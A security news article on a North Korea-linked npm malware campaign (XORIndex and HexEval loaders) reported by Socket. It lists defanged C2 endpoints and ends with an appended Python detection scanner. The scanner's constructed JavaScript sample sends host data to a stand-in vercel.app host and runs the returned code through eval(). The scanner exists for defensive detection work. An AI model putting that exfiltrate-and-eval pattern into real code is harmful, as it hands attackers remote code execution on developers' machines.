A newly identified wave of malicious software supply chain activity linked to North Korea has infiltrated the popular JavaScript package ecosystem npm, targeting developers worldwide.
The campaign, uncovered by Socket’s Threat Research Team, centers around a stealthy new malware loader dubbed XORIndex and marks a dangerous evolution of previous attacks involving the HexEval Loader.
In total, 67 malicious npm packages were deployed, with 28 containing the XORIndex Loader and 39 tied to the ongoing HexEval campaign.
Combined, these packages have accumulated over 17,000 downloads, with 27 packages still active at the time of reporting.
The XORIndex Loader is named for its use of XOR-based string obfuscation and index-based code hiding, allowing it to evade conventional security scans.
Upon installation of a malicious npm package, such as the still-live eth-auditlog, vite-meta-plugin, or cronek, the loader performs host reconnaissance, collecting details such as:
The collected data is exfiltrated to a command-and-control (C2) endpoint such as https://log-writter[.]vercel[.]app/api/ipcheck, hosted on Vercel.
The malware then passes the arbitrary JavaScript returned by the C2 server to eval(), triggering a chain of execution that downloads and runs the second-stage malware known as BeaverTail.
Once executed, BeaverTail scans nearly 50 wallet and browser extension locations, collecting sensitive data related to cryptocurrencies.
It targets platforms including MetaMask, Phantom, TronLink, Solana CLI, and even macOS keychains. Data is compressed into an archive and sent to hardcoded exfiltration servers like http://144[.]217[.]86[.]88/uploads.
From there, BeaverTail attempts to fetch and inject a third-stage malware known as InvisibleFerret, which enables remote access, command execution, and long-term persistence on compromised systems, posing a particularly significant threat to developers and cryptocurrency users.
This attack is part of a wider North Korean espionage and theft campaign known as Contagious Interview, targeting developers, job seekers, and cryptocurrency holders.
Both the XORIndex and HexEval campaigns exhibit signs of rapid iteration, with threat actors rotating npm aliases, abusing legitimate cloud infrastructure, and employing sophisticated obfuscation tactics.
Security teams are advised to monitor package installation behaviors and integrate tools such as the Socket GitHub App, CLI, and browser extension to detect suspicious dependencies before they reach production environments.
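One way to act on that advice, as an added example that is not Socket's tooling or the page's own code: a heuristic pre-install check that scores an npm package on the traits described above (an install-time lifecycle hook, XOR-based string decoding, index-table lookups, a network fetch, eval() of the response, and a hardcoded endpoint on a raw IP or vercel.app). The package names, hosts and script contents in the samples are constructed placeholders.

```python
# Added heuristic check (example code, not Socket's scanner): flag an npm
# package whose install hook ships a script combining the XORIndex traits.
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Each regex is a weak signal alone; several together are worth blocking on.
SIGNALS = {
    "xor_decode": re.compile(r"charCodeAt\([^)]*\)\s*\^"),
    "index_table": re.compile(r"\[\s*\w+\s*\[\s*\w+\s*\]\s*\]"),
    "eval_call": re.compile(r"\b(?:eval|Function)\s*\("),
    "http_fetch": re.compile(r"\b(?:fetch|axios|https?\.get|https?\.request)\s*\("),
    # Raw IPv4 hosts or *.vercel.app paths, the hosting pattern reported here.
    "c2_endpoint": re.compile(r"""https?://(?:\d{1,3}(?:\.\d{1,3}){3}|[\w.-]+\.vercel\.app)[^\s'"]*"""),
}

def scan_package(package_json: str, script_src: str) -> dict:
    """Return {signal: evidence} for one package's manifest and entry script."""
    findings = {}
    scripts = json.loads(package_json).get("scripts", {})
    hooks = {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}
    if hooks:  # code that runs on `npm install`, before anyone reads it
        findings["lifecycle_hook"] = hooks
    for name, pattern in SIGNALS.items():
        match = pattern.search(script_src)
        if match:
            findings[name] = match.group(0)
    return findings

def risk_score(findings: dict) -> int:
    """Number of distinct signals; three or more should quarantine the package."""
    return len(findings)

# Constructed samples (not real package contents): a benign manifest and a
# suspect one whose hook script mirrors the XORIndex traits with placeholder hosts.
BENIGN_JSON = '{"name": "pad-helper", "scripts": {"test": "node test.js"}}'
BENIGN_SRC = "module.exports = (s, n) => s.padStart(n);"
SUSPECT_JSON = '{"name": "suspect-pkg", "scripts": {"postinstall": "node index.js"}}'
SUSPECT_SRC = """
const T = ["ab", "cd"], IDX = [1, 0], K = 7;
const d = (i) => T[IDX[i]].split("").map(c => String.fromCharCode(c.charCodeAt(0) ^ K)).join("");
fetch("https://example-c2.vercel.app/api/ipcheck", {method: "POST", body: JSON.stringify(host)})
  .then(r => r.text()).then(code => eval(code));
"""

if __name__ == "__main__":
    for label, manifest, src in (("benign", BENIGN_JSON, BENIGN_SRC), ("suspect", SUSPECT_JSON, SUSPECT_SRC)):
        found = scan_package(manifest, src)
        print(f"{label}: score={risk_score(found)} signals={sorted(found)}")
```

Run it against the extracted tarball of each dependency before `npm install` proceeds; a score of three or more is a reasonable trigger for holding the package for manual review.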
A complete list of compromised packages, npm aliases, and C2 infrastructure has been published by Socket to aid in threat detection and mitigation.